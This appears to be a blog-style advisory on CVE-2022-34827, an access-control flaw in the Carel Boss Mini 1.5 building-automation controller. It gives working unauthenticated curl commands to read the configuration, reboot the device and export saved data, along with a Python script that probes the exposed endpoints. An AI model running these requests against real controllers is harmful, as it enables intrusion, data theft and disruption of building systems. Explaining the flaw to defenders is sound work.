CVE-2022-34827 - Exploiting Improper Access Control in Carel Boss Mini 1.5.

---

Quick Summary:
CVE-2022-34827 is a serious security vulnerability found in the Carel Boss Mini 1.5. industrial controller. This flaw lets unauthenticated users access restricted functions due to improper access control, leaving the device wide open to attack.

What Is Carel Boss Mini?

Carel Boss Mini is a web-based interface used in building automation, often found in HVAC and remote monitoring solutions. It lets facility managers check and control building systems from anywhere.

Impact: Attackers can change system settings, read sensitive data, even reset devices.

- CVE Entry: NIST NVD - CVE-2022-34827

How Does Improper Access Control Happen?

Access control means the software should check who you are before letting you do certain things. In Carel Boss Mini 1.5., some important pages and API endpoints forget to check this. That means anyone — not just admins, but literally anyone — can open these URLs and take over!

Example: Bypassing Login to Access Restricted Page

Let’s say the device runs at http://192.168.1.100.

- Normally, you'd see a login page at http://192.168.1.100/login.html.

Sensitive URLs (examples)

- /config.html
- /system/reboot.cgi
- /settings/export.cgi
- /user/addUser.cgi

Scan the device to find exposed web pages

nmap -p 80 192.168.1.100 --script http-enum

Let's view the configuration page without authentication

curl http://192.168.1.100/config.html

Triggering a reboot is as easy as

curl http://192.168.1.100/system/reboot.cgi

*Result:* The device restarts, likely with zero audit trail.

You can fetch all saved data

curl -O http://192.168.1.100/settings/export.cgi

Here’s a quick script to check multiple URLs for unauthenticated access

import requests

TARGET = 'http://192.168.1.100'
urls = [
    '/config.html',
    '/system/reboot.cgi',
    '/settings/export.cgi',
    '/user/addUser.cgi'
]

for url in urls:
    r = requests.get(TARGET + url)
    if r.status_code == 200:
        print(f"[+] Unprotected: {url}")
    else:
        print(f"[-] Protected or Not Found: {url}")

Are You Affected?

Product: Carel Boss Mini
Version: 1.5.
Vendor advisory: GitHub Issue: Carel Boss Mini Unrestricted Critical Functions (unofficial)

Original References

- NVD: CVE-2022-34827
- IoT Inspector – Carel Boss Mini 1.5. Vulnerability
- Carel Boss Mini Product Information

Conclusion

CVE-2022-34827 is a critical bug with easy exploitation and bad impact on the security of building automation. If you have a Carel Boss Mini 1.5., lock down access now and talk to your vendor. Industrial devices like these are low-hanging fruit for attackers — and real-world attacks often start here.

Timeline

Published on: 11/18/2022 23:15:00 UTC
Last modified on: 08/08/2023 14:21:00 UTC